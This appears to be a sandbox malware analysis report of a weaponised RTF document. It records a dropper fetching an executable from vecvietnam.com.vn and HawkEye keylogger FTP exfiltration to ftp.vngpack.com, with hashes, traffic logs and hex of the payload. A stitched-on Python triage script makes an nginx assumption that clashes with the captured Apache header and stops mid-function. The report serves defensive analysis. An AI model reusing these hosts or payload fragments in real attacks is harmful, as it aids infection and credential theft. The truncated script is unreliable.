Size (bytes):222384
Entropy (8bit):3.709483134949932
Encrypted:false
SSDEEP:3072:hInz7rlqTKfkx9akY7jt71AJHC2yuPNY7ogOYeF3JzU/jvL8tJ//:hiDUKfKozjAJrlPmgLF5MSh
MD5:7357D4D835CCA92021169389B613BC73
SHA1:8A8F62164C39D5D54FE29B9EC52D33D0D1A3E378
SHA-256:898A57398870413055747E5BCC4DD97655E0D45D05057FC03100E2A76151EDD8
SHA-512:58D835C92BEAFFAADD19B9EE8C5426AE49EA3809D41EF6DC05F54B720DC3C4DA1839E06A90F95010B04177D0B63652746DDFE63FF20F1C998C2F9A4B62E96526
Malicious:false
Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .q.B.b.0.z.x.y.6.M.8.o.e.h.G.3.A.a.Y.h.3.t.6.v.w.h.T.g.P.N.P.F.q.r.r.K.X._.G.C.s.Z.m.y.v.b.P.8.U.0.9.I.4.N.2.v.X.7.e.q.o................................................................. .!.".#.$.%.&.'.(.).*.+.,.-.../.0.1.2.3.4.5.6.7.8.9.:.;.<.=.>............... . . . . . .6.2.5.2.6.1.6.2.6.2.5.2.6.1.6.2._.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U
C:\Users\user\AppData\Local\Temp\InstallUtil.exe
Process:C:\Users\user\AppData\Roaming\name.exe
File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:dropped
Size (bytes):41136
Entropy (8bit):6.155874259465173
Encrypted:false
SSDEEP:384:C/xHdGK81tLhBLVKS7xdgoPKJ9Yl6dnPU3SERztmbqCJstdMardz/JikPZ+aPZCM:+Hj81t/0qdrY6Iq8KDLJqisEBuot
MD5:BB85AA6D90A4157ED799257072B265FF
SHA1:F97DA28D82E9D81672C78FFBE03123E985E7F6D4
SHA-256:815FD29D891CB94418BB0CDC44D5095230989FE9DA58421319FCD57E458E39A9
SHA-512:17EBB032F3663D7971DBE13EE89C82D2D4CF3375C0DA44021D35178DE046FCB2BFB5F89E7CFC68CF4E8570D21FDD9876759443BFDE6CFF5A2A354D2361E64F1E
Malicious:true
Antivirus:
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: Paiement de facture.doc, Detection: malicious
• Filename: ORDER SPECIFICATION.doc, Detection: malicious
• Filename: UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864888.doc, Detection: malicious
• Filename: UPSSHIPMENT_CONFIRMATION_CBJ19051700013_11Z35Q6Q80446518864.doc, Detection: malicious
• Filename: Quotations73280126721_Oriental_Fastech_Manufacturing.doc, Detection: malicious
• Filename: PurchaseOrder78902AprilOrderNewRoundBars.doc, Detection: malicious
• Filename: PO_701_36_01_27.doc, Detection: malicious
• Filename: IMG_51067.doc__.rtf, Detection: malicious
• Filename: New Order 09022021.doc, Detection: malicious
• Filename: deliverysorders.doc, Detection: malicious
• Filename: IMG_Scanned_67022.doc, Detection: malicious
• Filename: ORD005271444_0.doc, Detection: malicious
• Filename: INV00004423.doc, Detection: malicious
• Filename: DTBT760087673.doc, Detection: malicious
• Filename: IMG_33687.doc, Detection: malicious
• Filename: IMG_1660392.doc, Detection: malicious
• Filename: Purchase Order No. 3109 Dated 28.01.2021.doc, Detection: malicious
• Filename: Order_130577.doc, Detection: malicious
• Filename: IMG-79108.doc, Detection: malicious
• Filename: IMG-6661.doc, Detection: malicious
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....W..............0..T.........."r... ........@.. ...............................[....`..................................q..O....................b...>...........p............................................... ............... ..H............text...(R... ...T.................. ..`.rsrc................V..............@..@.reloc...............`..............@..B.................r......H........"...J...........m.......o......................................2~.....o....*.r...p(....*VrK..p(....s.........*..0..........(....(....o....o....(....o.... .....T(....o....(....o....o....o ....4(....o....(....o....o....o!.....(....rm..ps"...o....(#........($....o%....ry..p......%.r...p.%.(.....(....(&....('.......o(...(&........*.*................"..()...*..{Q...-...}Q.....(*...(....(+....(*...*"..(,...*..(....*..(-....r...p.(....o/...s....}T...*....0.. .......~S...-.s
C:\Users\user\AppData\Local\Temp\bhv53DC.tmp
Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Extensible storage engine DataBase, version 0x620, checksum 0x63a10f1a, page size 32768, DirtyShutdown, Windows version 6.1
Category:dropped
Size (bytes):21037056
Entropy (8bit):1.1463834484624762
Encrypted:false
SSDEEP:24576:G41U91o2I+0mZ5lThHLLGpHqqnEXwPtofJIRH330nW/jMB1emX4UJlNd:G4EXd1LoHqqEXwPW+RHA6m1fN
MD5:E645A86C0BECF0D017469128088487DE
SHA1:8569671565B972EF80D3956930CBD1A5E4238162
SHA-256:6228287DC6D1A0CB345D495AEC250FFF69D18394472806FEA2A12AA9F2655C59
SHA-512:4C7CC36CEBC16802D34C1C7BDD87CFCB4DB43217C5AC1F78B3D6B9F2AB425D2B9D4B780898CDAFDAEA25AEEE1A3AA961A4324BB3A05D4DD629395F6B7BC71E7E
Malicious:false
Reputation:unknown
Preview: c...... ........................u......................s............x..%....x.......................................u..............................................................................................$............................................................................................................................... .......7....x......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Local\Temp\holderwb.txt
Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:Little-endian UTF-16 Unicode text, with no line terminators
Category:dropped
Size (bytes):2
Entropy (8bit):1.0
Encrypted:false
SSDEEP:3:Qn:Qn
MD5:F3B25701FE362EC84616A93A45CE9998
SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:false
Reputation:unknown
Preview: ..
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\280072109764552.LNK
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed Jul 28 23:00:39 2021, length=2202571, window=hide
                                                                                      Category:dropped
                                                                                      Size (bytes):2078
                                                                                      Entropy (8bit):4.518299053002962
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:8nn/XTFGqJRMwJZJKQh2nn/XTFGqJRMwJZJKQ/:8n/XJGqJCwTJKQh2n/XJGqJCwTJKQ/
                                                                                      MD5:FDE744CEF016E7DAA5DA08F2B71138CC
                                                                                      SHA1:3D6092AC3EDEF45AF08F0E39E694944F83BC6FE2
                                                                                      SHA-256:3D4407EEEDBAAC0882912745F968F53A43D76383B636A762635D7BD76EE8A9BE
                                                                                      SHA-512:763B72143D0A339034F2C6E2DE4D5D3DE7185FF891430AEA37CCF0D0FC3EFCDA56DF65214FBB4840FFDDC0AC3EBA73AF466218A4C1F84AA8341EA561346AF866
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):83
                                                                                      Entropy (8bit):4.166164961457805
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:M1XoXMJQQwltSXMJQQwlmX1XoXMJQQwlv:MiXw0SXwwXwy
                                                                                      MD5:D50CD7F18A3AC9442290FC4BEB5A10F9
                                                                                      SHA1:4C7585A1E0B987034382D26D99104BEABD6B3DEE
                                                                                      SHA-256:F58D9EB8912ED9BC8AEFF531B3104846F1125AC9CA1F9401C0D97ABAB28F602D
                                                                                      SHA-512:9D051D32591D223DA36287D5251ED45F3B7D7F31585C1CE25D04EDB22271AB47B497D520F7B111766D9D7111E7C6170DBBEA49FA80B30660578474EC43E31E1D
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: [doc]..280072109764552.LNK=0..280072109764552.LNK=0..[doc]..280072109764552.LNK=0..
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.4311600611816426
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                                                                      MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                                                                      SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                                                                      SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                                                                      SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):1.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:Qn:Qn
                                                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: ..
                                                                                      C:\Users\user\AppData\Roaming\name.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):1383936
                                                                                      Entropy (8bit):6.545078865817934
                                                                                      Encrypted:false
                                                                                      SSDEEP:24576:inGai6Dban0+uhHJQNmj3X2rhK1+pSRs/8Mz3g:T6iuNH261Rs/
                                                                                      MD5:FA0A3ED04EEC65D6D3FB55AA7D2497C1
                                                                                      SHA1:89AAFE0CFEC4ECC13FD7F255B1E6E8AF903DDBD0
                                                                                      SHA-256:2C6DF9A84B482C1DD1AF8EE142CCDFEAB23234A8507F3CC637AEE9161A6C58B8
                                                                                      SHA-512:DA69F632F0BC9789BF17D1CFDBF09C991098227A23E3BD273C1C5720B53D9EB81B99C0121F632CBC2EB25ECE51E6548470DC2FD0ED64D37F88A58A005B1C7B3D
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Reputation:unknown
                                                                                      C:\Users\user\AppData\Roaming\pid.txt
                                                                                      Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):4
                                                                                      Entropy (8bit):2.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:i:i
                                                                                      MD5:60AD83801910EC976590F69F638E0D6D
                                                                                      SHA1:80C06016B31FFA3B0D157BEF344A5FE03CC7FD75
                                                                                      SHA-256:A8302321E60791AE50456D85F1BB8B3EF92FBFB23A081DA45EF468BE922AE9B1
                                                                                      SHA-512:58B7EC6BFCB9960F48BD5D9AF6C0F53B85E1D16F0E4C2F135C9507143C9261B54E888FBA14EE08CA72199790A9D471DA4FE81F31A9664438C2EA0D3B84958CF1
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: 2964
                                                                                      C:\Users\user\AppData\Roaming\pidloc.txt
                                                                                      Process:C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      File Type:ASCII text, with no line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):49
                                                                                      Entropy (8bit):4.295746773031725
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:oNXp4E2J5xAIOWRxRI0dAn:oNP23f5RndA
                                                                                      MD5:2D61FD97BB78C3900DD39B26447C5C1A
                                                                                      SHA1:117F447B8159E31DF5B4422F07B04267231B4A8E
                                                                                      SHA-256:49A7F6995E282A8964916CFCB0A1982BC5418EF85AB7224EBC420C21281B91C9
                                                                                      SHA-512:B57128EE990D8F213045ECE49D7F8C3283415B1DAB22C79D3F39EF98D63F0A778D9CB095597FC57ED72F74C85036E59CCA2E7BAD3963E5758C59CB9ACE4518DF
                                                                                      Malicious:false
                                                                                      Reputation:unknown
                                                                                      Preview: C:\Users\user\AppData\Local\Temp\InstallUtil.exe
                                                                                      C:\Users\user\Desktop\~$0072109764552.doc
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):162
                                                                                      Entropy (8bit):2.4311600611816426
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vrJlaCkWtVyyKbE/w+FUYlln:vdsCkWt/AE51ll
                                                                                      MD5:B1035D12CDF3CD7AA18A33C0A1D17AAE
                                                                                      SHA1:CE8244E4A5E407568BA15A7C6DC2F6428306EBB8
                                                                                      SHA-256:CD49B04F30968B85CBAFD1F9F836CA1950BBEC2BE717B3D1430DBE57615BF425
                                                                                      SHA-512:E34F595696EB91153F1B8EE51D12F48ED8B8969453FA76B97DB94C509F6BDF089466DEE51A51727AD5A8B546F6C96FF679ADA98A451EEACA3CB9C08C01F388B6
                                                                                      Malicious:false
                                                                                      Reputation:unknown

Static File Info

General

File type: Rich Text Format data, unknown version
Entropy (8bit): 3.788704695837854
TrID:
• Rich Text Format (5005/1) 55.56%
• Rich Text Format (4004/1) 44.44%
File name: 280072109764552.doc
File size: 2202571
MD5: ae01f0cc63c8a3b7bb239976c56788c3
SHA1: cd86bb62ab645cab4d20ec8a931ca9e84801ea36
SHA256: fde845dc869db03ce766a34d4d325cfb60ea5e605244e823fcfea5b3135aacb7
SHA512: ec2dec52a3210a3d7df8d19fb9fe92051d88f08c75f4d97a7376f89050aab13c1ace29206fa162eea37de9d4fa0a1e39146471dd4dd14d29cc9084cd442d8a7a
SSDEEP: 12288:Bkw1w+//ay0/EFUHnrtIJBa/BtfOLaZQWrS+H8UErBQLeugE:mw6uay0/ECGJSfOLTmwrOgE
                                                                                      File Content Preview:{\rtf9038{\object23144237 \'' \objlink96638503\objupdate4984801149848011\objw3937\objh7665{\*\objdata297062 {{{{{{{{{{{{{{{{{{{{{{\bin000000000 {\*\objdata297062 } \a

File Icon

Icon Hash: e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id | Start | Format ID | Format | Classname | Datasize | Filename | Sourcepath | Temppath | Exploit
0 | 000000EAh |  |  |  |  |  |  |  | no
1 | 000000AEh | 2 | embedded | 21H85GTZHAz | 1046016 |  |  |  | no

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
07/28/21-17:02:02.953811 | TCP | 2020410 | ET TROJAN HawkEye Keylogger FTP | 49171 | 21 | 192.168.2.22 | 45.141.152.18

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                      Jul 28, 2021 17:01:17.167258978 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167294025 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167299032 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167323112 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167330980 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167352915 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167366982 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167388916 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167397022 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167412996 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167418003 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167435884 CEST8049167103.255.237.180192.168.2.22
                                                                                      Jul 28, 2021 17:01:17.167443991 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167464018 CEST4916780192.168.2.22103.255.237.180
                                                                                      Jul 28, 2021 17:01:17.167568922 CEST8049167103.255.237.180192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 28, 2021 17:01:16.151007891 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 28, 2021 17:01:16.174184084 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 28, 2021 17:01:16.174407005 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jul 28, 2021 17:01:16.197423935 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jul 28, 2021 17:01:21.274135113 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jul 28, 2021 17:01:21.297693014 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jul 28, 2021 17:01:22.159069061 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jul 28, 2021 17:01:22.193195105 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jul 28, 2021 17:01:22.201668978 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jul 28, 2021 17:01:22.238142014 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jul 28, 2021 17:01:41.888184071 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jul 28, 2021 17:01:41.909600019 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jul 28, 2021 17:02:02.531776905 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jul 28, 2021 17:02:02.579814911 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 28, 2021 17:01:16.151007891 CEST | 192.168.2.22 | 8.8.8.8 | 0xe5d1 | Standard query (0) | vecvietnam.com.vn | A (IP address) | IN (0x0001)
Jul 28, 2021 17:01:16.174407005 CEST | 192.168.2.22 | 8.8.8.8 | 0xe5d1 | Standard query (0) | vecvietnam.com.vn | A (IP address) | IN (0x0001)
Jul 28, 2021 17:01:21.274135113 CEST | 192.168.2.22 | 8.8.8.8 | 0xf76a | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)
Jul 28, 2021 17:01:41.888184071 CEST | 192.168.2.22 | 8.8.8.8 | 0xff79 | Standard query (0) | 3.246.11.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Jul 28, 2021 17:02:02.531776905 CEST | 192.168.2.22 | 8.8.8.8 | 0xe1af | Standard query (0) | ftp.vngpack.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 28, 2021 17:01:16.174184084 CEST | 8.8.8.8 | 192.168.2.22 | 0xe5d1 | No error (0) | vecvietnam.com.vn | | 103.255.237.180 | A (IP address) | IN (0x0001)
Jul 28, 2021 17:01:16.197423935 CEST | 8.8.8.8 | 192.168.2.22 | 0xe5d1 | No error (0) | vecvietnam.com.vn | | 103.255.237.180 | A (IP address) | IN (0x0001)
Jul 28, 2021 17:01:21.297693014 CEST | 8.8.8.8 | 192.168.2.22 | 0xf76a | No error (0) | www.google.com | | 142.250.203.100 | A (IP address) | IN (0x0001)
Jul 28, 2021 17:01:41.909600019 CEST | 8.8.8.8 | 192.168.2.22 | 0xff79 | Name error (3) | 3.246.11.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Jul 28, 2021 17:02:02.579814911 CEST | 8.8.8.8 | 192.168.2.22 | 0xe1af | No error (0) | ftp.vngpack.com | | 45.141.152.18 | A (IP address) | IN (0x0001)

                                                                                      HTTP Request Dependency Graph

                                                                                      • vecvietnam.com.vn

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49167 | 103.255.237.180 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
Jul 28, 2021 17:01:16.446929932 CEST | 0 | OUT | GET /xpen3/09867654270721.PDF.exe HTTP/1.1
                                                                                      Accept: */*
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                      Host: vecvietnam.com.vn
                                                                                      Connection: Keep-Alive
Jul 28, 2021 17:01:16.679267883 CEST | 2 | IN | HTTP/1.1 200 OK
                                                                                      Server: Apache
                                                                                      Date: Wed, 28 Jul 2021 15:01:16 GMT
                                                                                      Content-Type: application/octet-stream
                                                                                      Content-Length: 1383936
                                                                                      Last-Modified: Wed, 28 Jul 2021 00:30:49 GMT
                                                                                      Connection: keep-alive
                                                                                      ETag: "6100a539-151e00"
                                                                                      Expires: Fri, 27 Aug 2021 15:01:16 GMT
                                                                                      Cache-Control: max-age=2592000
                                                                                      Accept-Ranges: bytes
                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c7 80 a0 3c 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 0a 15 00 00 12 00 00 00 00 00 00 ce 29 15 00 00 20 00 00 00 40 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 15 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 29 15 00 4f 00 00 00 00 40 15 00 84 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 15 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 09 15 00 00 20 00 00 00 0a 15 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 84 0e 00 00 00 40 15 00 00 10 00 00 00 0c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 15 00 00 02 00 00 00 1c 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 29 15 00 00 00 00 00 48 00 00 00 02 00 05 00 cc 31 14 00 b0 f7 00 00 03 00 02 00 ec 00 00 06 d0 8b 03 00 fa a5 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c 4a ec 6a f8 97 e3 ec dd a8 de 31 58 b3 92 bf 6e 7d d6 d1 7c 1a 30 16 5f fe 66 6f 61 b5 17 5e 25 4d d0 96 03 24 43 31 ca 10 
70 05 87 34 b9 93 18 8f b3 a1 c5 5d da 81 19 d5 0a f9 30 73 8b 28 90 7f 0c 0b e2 fa bc 49 3a a5 07 6c a8 2a 8e 2b 44 d2 57 d0 01 75 97 c7 71 4e 7c 2c 19 49 00 56 83 48 74 07 27 ae b0 1d d2 6a 67 20 55 6d d7 ed 46 de b4 5d 1c b9 26 1a e6 44 98 93 7d 8f 2f ef a4 b0 e8 60 b5 87 03 95 21 39 fc 96 0e 77 71 04 76 8d e4 3a 94 a1 39 c9 21 59 1f e2 16 1d 9e 43 3a 76 7a a4 84 76 38 be da 1e 3c e1 bc 8f 0c 6f d1 93 1d ee a9 f4 5b 03 76 1e 3f 5b 67 20 7f 04 9a b9 5c 96 fb cb 7e fe 55 26 5e 75 65 57 0d 90 4c ae 10 81 00 af 99 44 1a 77 2e 65 37 dc 56 ba 9e 37 47 02 33 74 72 05 15 1d 99 83 95 e5 9c 1f 11 ad 0e b7 0f fd 04 ea 20 17 7c 84 9d 19 c6 78 ce a3 d5 2d 0f 0a 5d d7 3c 0a 6b e1 15 15 ae 34 d9 0f 53 88 cd 9e ab a0 33 5c e1 1c f7 ed 67 fb 55 21 b4 f1 0f 6f 0f 07 50 36 7b 04 91 22 d4 0a 68 48 a9 8e c4 3d a9 2f f6 35 f8 b2 27 41 de 4d a2 6f 8b f3 60 bb 24 6a fe 4b 38 96 22 a6 0e 11 86 d7 b3 ae 44 d8 36 17 76 84 f9 d8 75 5b df 0e 56 2d 61 21 95 df a9 ab 23 3f 8e 78 05 13 0d 4f 27 e7 2b 4e 8d 2f 09 c9 39 73 7d da c0 4a f3 a3 6b 29 40 f3 45 ec 7a a5 2d 07 8a 04 49 bc 12 63 76 a9 b1 8d 2f 90 80 26 24 97 e7 22 62 cd e9 d8 4a ea 0d da
                                                                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<) @@ `|)O@` H.text `.rsrc@@@.reloc`@B)H1Jj1Xn}|0_foa^%M$C1p4]0s(I:l*+DWuqN|,IVHt'jg UmF]&D}/`!9wqv:9!YC:vzv8<o[v?[g \~U&^ueWLDw.e7V7G3tr |x-]<k4S3\gU!oP6{"hH=/5'AMo`$jK8"D6vu[V-a!#?xO'+N/9s}Jk)@Ez-Icv/&$"bJ
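The first bytes of that response are enough to classify the payload before the full file is carved from the pcap. The Python below is an added example and not part of the Joe Sandbox report: it transcribes the header bytes printed in the Data Raw field (zero runs collapsed; data directories and section table re-packed from the same values), parses the PE headers, follows data directory 14 to the CLR header, and cross-checks the file size implied by the section table against Content-Length, the ETag and the size of the dropped name.exe listed under System Behavior. The only assumption is that the two-field hex ETag is the mtime-size form that nginx emits; everything else comes from the page.

```python
"""Header triage of the EXE that EQNEDT32.EXE fetched from vecvietnam.com.vn.

Added example, not part of the Joe Sandbox report. FIRST_BYTES is transcribed
from the "Data Raw" field of the 200 OK above (zero runs collapsed; data
directories and section table re-packed from the same values).
"""
import struct
from datetime import datetime, timezone

RESPONSE_HEADERS = {  # from the captured response
    "Content-Length": "1383936",
    "Last-Modified": "Wed, 28 Jul 2021 00:30:49 GMT",
    "ETag": '"6100a539-151e00"',
}
_DIRS = ([(0, 0), (0x15297C, 0x4F), (0x154000, 0xE84), (0, 0), (0, 0), (0x156000, 0xC)]
         + [(0, 0)] * 6 + [(0x2000, 8), (0, 0), (0x2008, 0x48), (0, 0)])
_SECS = [(b".text", 0x1509D4, 0x2000, 0x150A00, 0x200, 0x60000020),
         (b".rsrc", 0xE84, 0x154000, 0x1000, 0x150C00, 0x40000040),
         (b".reloc", 0xC, 0x156000, 0x200, 0x151C00, 0x42000040)]
FIRST_BYTES = (
    bytes.fromhex("4d5a90000300000004000000ffff0000b8000000000000004000000000000000")
    + bytes(28) + bytes.fromhex("80000000")                       # e_lfanew = 0x80
    + bytes.fromhex("0e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f"
                    "742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000")
    + bytes.fromhex("504500004c010300c780a03c0000000000000000e0000201")  # PE\0\0 + COFF
    + bytes.fromhex("0b010800000a15000012000000000000ce291500002000000040150000004000"
                    "0020000000020000040000000000000004000000000000000080150000020000"
                    "0000000002006085000010000010000000001000001000000000000010000000")
    + b"".join(struct.pack("<II", *d) for d in _DIRS)
    + b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, rs, rp, 0, 0, 0, 0, ch)
               for n, vs, va, rs, rp, ch in _SECS)
    + bytes(16)                                                   # pad to 0x200
    + bytes.fromhex("b029150000000000")                           # IAT slot (_CorExeMain)
    + bytes.fromhex("4800000002000500cc311400b0f7000003000200ec000006d08b0300faa51000")
)


def parse_pe(data):
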